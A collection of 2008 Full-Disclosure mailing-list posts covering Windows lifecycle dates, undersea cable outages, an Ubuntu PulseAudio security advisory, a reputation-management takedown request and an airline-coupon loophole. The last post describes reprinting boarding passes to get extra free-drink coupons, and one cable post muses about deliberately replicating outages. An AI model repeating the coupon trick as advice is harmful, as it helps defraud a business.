On Wednesday 30 January 2008 08:32:36 scott wrote: Yes and MS quietly extended 98 for a few more years until they came out with 2000.A much better OS than ME at the time,IMHO. While Windows 98 SE was the best of the 9x series, I don't think anyone really mourned its passing (I still use it under Qemu). XP would have been hands down a better system except for its obnoxious copy protection. Even so, the stability advantages XP yielded made it a better system. Windows 2000 and ME were released the same year (2000 first, if I remember). 2000 was seen as an update to NT4, not 98. 2000 was the first NT OS to include plug and play, but the conversion from 98 to 2000 required a full reinstall. XP let you upgrade your Windows 9x system directly, although that was probably not a good idea. If there is a best Windows candidate, I would vote for Windows 2000. It was relatively light weight, stable, and it offered minimal copy protection. -- Hawaiian Astronomical Society: http://www.hawastsoc.org HAS Deepsky Atlas: http://www.hawastsoc.org/deepsky ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Save XP
Tyler, You're correct. 2009 Windows Se7en RTM http://en.wikipedia.org/wiki/Windows_7 2012 Vista Basic EOL http://support.microsoft.com/lifecycle/?p1=11731 2014 XP Home xEOL http://support.microsoft.com/lifecycle/?p1=3221 2014 XP Pro xEOL http://support.microsoft.com/lifecycle/?p1=3223 2017 Vista Bus xEOL http://support.microsoft.com/lifecycle/?p1=11707 2017 Vista Ent xEOL http://support.microsoft.com/lifecycle/?p1=11737 Still, there's a big difference in lifecycle. XP was introduced in 2001, and planned EOL is 2009 (eight year lifecycle). Vista was introduced in 2007, and planned EOL is 2012 (five year lifecycle). That's pretty short product lifecycle for a $10B* development effort. *Ref: http://seattletimes.nwsource.com/html/businesstechnology/2003460386_btview04.html Bill Stout - Original Message From: Tyler Reguly [EMAIL PROTECTED] To: scott [EMAIL PROTECTED] Cc: full-disclosure@lists.grok.org.uk Sent: Thursday, January 31, 2008 2:52:23 AM Subject: Re: [Full-disclosure] Save XP Sometimes I'm reminded of why Full Disclosure amuses me and why I stay subscribed On 1/30/08, scott [EMAIL PROTECTED] wrote: Yes and MS quietly extended 98 for a few more years until they came out with 2000.A much better OS than ME at the time,IMHO. Windows ME Release Date: Sept. 14, 2000 Windows 2000 Release Date: Feb. 17, 2000 Windows 2000 was out half a year ahead of Windows ME... so something tells me they didn't quietly extend 98 for a few more years until they came out with 2000... even if you were talking XP (which was Oct 2001) it would be a year, not a few years. Bill: You aren't being fair with our EOL dates. You are comparing XP Pro (Officially a business operating system) to Vista Home Premium (a Home operating System)... you have to compare XP Pro to a Business version of Vista and when you do that you get Vista Business with an EOL of 2017 ( http://support.microsoft.com/lifecycle/?p1=11707 ), 3 years after XP Pro. Tyler. -Inline Attachment Follows- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] back to high value targets
On Jan 31, 2008 3:51 PM, gmaggro [EMAIL PROTECTED] wrote: One planned for Egypt-France is 8 pair, each pair doing 128 lambdas at 10Gbit per lambda. Do the math. That's a lot of retards And they dont have to upgrade the fiber in order to upgrade the bandwidth. They use the same fiber and just swap out the lasers on either side -JP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] back to high value targets
On Thu, 31 Jan 2008 16:39:57 EST, Dude VanWinkle said: On Jan 31, 2008 3:51 PM, gmaggro [EMAIL PROTECTED] wrote: One planned for Egypt-France is 8 pair, each pair doing 128 lambdas at 10Gbit per lambda. Do the math. That's a lot of retards And they dont have to upgrade the fiber in order to upgrade the bandwidth. They use the same fiber and just swap out the lasers on either side Within limits - the replacement laser has to be something that works with the regen units located every 30 to 50 miles or so along the cable (incidentally, getting power to a regen unit that's 1,500 miles down the cable and under 4 miles of water is non-trivial - the usual solution for that is to pump a high-voltage feed down a copper conductor in the cable. Only one conductor is needed, because salt water makes a *very* good ground. ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] back to high value targets
Maybe I'm going about this wrong? I suspect if you figured out a way to downgrade a handful of bond/investment companies we might be eating squirrel meat in the local park come spring ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-573-1] PulseAudio vulnerability
=== Ubuntu Security Notice USN-573-1 January 31, 2008 pulseaudio vulnerability CVE-2008-0008 === A security issue affects the following Ubuntu releases: Ubuntu 7.04 Ubuntu 7.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 7.04: pulseaudio 0.9.5-5ubuntu4.2 Ubuntu 7.10: pulseaudio 0.9.6-1ubuntu2.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: It was discovered that PulseAudio did not properly drop privileges when running as a daemon. Local users may be able to exploit this and gain privileges. The default Ubuntu configuration is not affected. Updated packages for Ubuntu 7.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/pulseaudio_0.9.5-5ubuntu4.2.diff.gz Size/MD5:17449 6b56fc19d1df82cfdced55206ef64679 http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/pulseaudio_0.9.5-5ubuntu4.2.dsc Size/MD5: 1265 a82ede30ebdafce09d266b6dd1cfe5b7 http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/pulseaudio_0.9.5.orig.tar.gz Size/MD5: 1145930 99b5d9efd4fce35cabb4ae5d0ebb230d amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/libpulse-browse0_0.9.5-5ubuntu4.2_amd64.deb Size/MD5:11500 ce80e767d1e30f8de6fd2ee6a2ed548c http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/libpulse-dev_0.9.5-5ubuntu4.2_amd64.deb Size/MD5: 181184 e3bda5b5754b975f7578462f7100de29 http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.5-5ubuntu4.2_amd64.deb Size/MD5:11570 da9e293b1f61b6cf225ba70b07efdeb1 http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/libpulse0_0.9.5-5ubuntu4.2_amd64.deb Size/MD5: 111218 e8631760459aadaeed2d0f9c42890f80 http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/pulseaudio-esound-compat_0.9.5-5ubuntu4.2_amd64.deb Size/MD5:27466 d4f6159b05f56e0a6d51a9f3f2af711e http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/pulseaudio_0.9.5-5ubuntu4.2_amd64.deb Size/MD5: 331220 d15cdd578190859a61588cfd69107e27 http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-module-gconf_0.9.5-5ubuntu4.2_amd64.deb Size/MD5:12856 9cba1bcd4c384a8ef902a82c005613cf http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-module-hal_0.9.5-5ubuntu4.2_amd64.deb Size/MD5:14880 8b4edc9db568a25a347d8e0acce0276d http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-module-lirc_0.9.5-5ubuntu4.2_amd64.deb Size/MD5: 9246 b20f4744d8b6b53286af6feac8bb3cbd http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-module-x11_0.9.5-5ubuntu4.2_amd64.deb Size/MD5:16188 c8dd2744ec424684f20959940b263a83 http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-module-zeroconf_0.9.5-5ubuntu4.2_amd64.deb Size/MD5:14592 5e20ed3a3ee9bc8d2e12db5066eb8bca http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-utils_0.9.5-5ubuntu4.2_amd64.deb Size/MD5:52792 ce4718ea982640fc8a953231d3f564ec i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/libpulse-browse0_0.9.5-5ubuntu4.2_i386.deb Size/MD5:10830 24ae5b0dc91be5dfc3791ac9ba6acfdc http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/libpulse-dev_0.9.5-5ubuntu4.2_i386.deb Size/MD5: 159190 4dc619974dcb7cdeb87969859d7e27df http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/libpulse-mainloop-glib0_0.9.5-5ubuntu4.2_i386.deb Size/MD5:10996 5c1bb793bc86ddfbbc8480d22e9428f6 http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/libpulse0_0.9.5-5ubuntu4.2_i386.deb Size/MD5: 100172 fd40e44f9345de1492cb1efa4ff68c77 http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/pulseaudio-esound-compat_0.9.5-5ubuntu4.2_i386.deb Size/MD5:25660 630da63c98812f52ba98f15f285f3226 http://security.ubuntu.com/ubuntu/pool/main/p/pulseaudio/pulseaudio_0.9.5-5ubuntu4.2_i386.deb Size/MD5: 295640 df569af31b96c7d658921c05c2bbe880 http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-module-gconf_0.9.5-5ubuntu4.2_i386.deb Size/MD5:12230 da658350c189df71ca7337ba48f8a5a8 http://security.ubuntu.com/ubuntu/pool/universe/p/pulseaudio/pulseaudio-module-hal_0.9.5-5ubuntu4.2_i386.deb Size/MD5:13746 9928dc07ff1782d509eccfb7d10bd342
Re: [Full-disclosure] back to high value targets
On Jan 31, 2008 12:35 PM, gmaggro [EMAIL PROTECTED] wrote: ... And a quip from the article that just tickles me pink: ...The outage, which is being blamed on a fault in a single undersea cable... two cables: FLAG Europe-Asia and SeaMeWe-4 This is all assuming that the story is true; that it is one cable, and not a cover for something else. Glomar Explorer and K-129 anyone? Maybe they're just patching in another Echelon node, hehe :) you'd be surprised how often trawlers, boat anchors, cable scavengers (yes, really!) and even marine life sever under sea cables... or maybe you wouldn't. no need to attribute to skilled malice (NSA taps from the undersea bay of the Jimmy Carter sub fiber splicing deck) what is easily accomplished via sheer stupidity or carelessness or simple bad luck. Doesn't really matter how or why the damage occured, the point is that fairly massive single points of failure clearly exist. rarely single points, but pairs or small groups. the moment you get a good pair of failures in a critical link, you often see cascading failures, and it turns into a a cyclone of crap hitting fans.. whee What does matter is how similar results could be replicated by a loose coalition of like-minded individuals using highly insecure media. i wuz just fishin' fur dungeness offisah, didnt mean no harmz to dem cablz!! I seriously wonder what the bandwidth of those are. DWDM can get pretty fat. the economic incentives to squeeze as much bandwidth as possible through every single strand makes these the phattest of the phat pipes, in general. On a somewhat related note, it's always been my guess that very little net traffic, relatively speaking, is carried over satellites due to the distance and lag issues. Is this a foolish notion? i don't know figures (anyone?) but this tends to be the case. sats are great for broadcast relay, but suck for low latency bi-directional comms. however, they do make useful backups. how else are you going to get data back and forth across the planet when those fibers get sliced? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] back to high value targets
On Jan 31, 2008 2:43 PM, coderman [EMAIL PROTECTED] wrote: ... On a somewhat related note, it's always been my guess that very little net traffic, relatively speaking, is carried over satellites due to the distance and lag issues. Is this a foolish notion? i don't know figures (anyone?) but this tends to be the case. sats are great for broadcast relay, but suck for low latency bi-directional comms. however, they do make useful backups. how else are you going to get data back and forth across the planet when those fibers get sliced? forgot to mention, they are definitely used for data, i just don't know how much. Mentat even provides a dedicated appliance with modified TCP like reliable stream delivery over sat links to accommodate the long, wide pipe characteristics of satellite transport. your typical TCP stack will severely under-utilize a sat link due to the latencies involved. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] A friendly request on behalf of Bart Cilfone
How much does the reputation Defender charge for to send the emails to mailing lists begging that they take down bad things about Fredrick Diggle. He is interested in their services and also for to have them ban certain libel people from the internets. Is this possible and how much will it cost Fredrick Diggle? His salary is not high at the zoo but he would be willing to pay a fair sum. YAY! On Jan 28, 2008 12:30 PM, reepex [EMAIL PROTECTED] wrote: lol best troll ever On 1/28/08, Donald Republic [EMAIL PROTECTED] wrote: Dear Full Disclosure, We are writing to you in behalf of Bart Cilfone. He has asked us to contact you and see if you will consider removing the content about him at: http://seclists.org/fulldisclosure/2008/Jan/0497.html Please allow us to introduce ourselves. We are ReputationDefender, Inc., a company dedicated to helping our clients preserve their good name on the Internet. Our founders and employees are all regular Internet users. Like our clients, and perhaps like you, we think the Internet is sometimes unnecessarily hurtful to the privacy and reputations of everyday people. Even content that is meant to be informative can sometimes have a significant and negative impact on someone's job prospects, student applications, and personal life. We invite you to learn more about who we are, at www.reputationdefender.com. When our clients sign up with our service, we undertake deep research about them on the Internet to see what the Web is saying about them. We find sites where they are discussed, and we ask our clients how they feel about those sites. Sometimes our clients express strong reservations about the content on particular websites. They may feel hurt, ashamed, or invaded by the content about them on those sites. As you may know, more and more prospective employers, universities, and newfound friends and romantic interests undertake Internet research, and the material they find can strongly impact their impressions of the people they are getting to know. When people apply for jobs, apply for college or graduate school, apply for loans, begin dating, or seek to do any number of other things with their lives, hurtful content about them on the Internet can have a negative impact on their opportunities. At some point or another, most of us say things about ourselves or our friends and acquaintances we later regret. We're all human, and we all do it! We are writing to you today because our client, Bart Cilfone, has told us that he would like the content about him on your website to be removed as it is outdated and disturbing to him. Would you be willing to remove or alter the content? It would mean so much to Mr. Cilfone, and to us. Considerate actions such as these will go a long way to help make the Internet a more civil place. Thank you very much for your consideration. We are mindful that matters like these can be sensitive. We appreciate your time. Please let us know if you have removed or changed the content on this site by sending an e-mail to: [EMAIL PROTECTED] Yours sincerely, Donald Republic Reputation Defender Service Team ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Southwest Airlines Ticket Silliness
Not sure if anyone posted this before; But I figured this would interest you guys... Southwest Airlines has a class of ticket called 'Business Select'. This ticket typically allows you to board the plane first, and because SWA doesn't have assigned seating means you have your pick of the seats on the plane. But there is quite an additional benefit. You also get a free drink ticket. But they seem to have forgotten something in the implementation of this: Being your drink coupon is issued to you when you print your boarding pass. It's also printed whenever you *reprint* your boarding pass! So if you feel like getting drunk on your flight, just print seven or eight boarding passes, and you'll have a good flight. I tried this a couple of weeks ago on a flight from San Diego to Kansas City, and I had myself 4 free drinks no problem. Adam ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
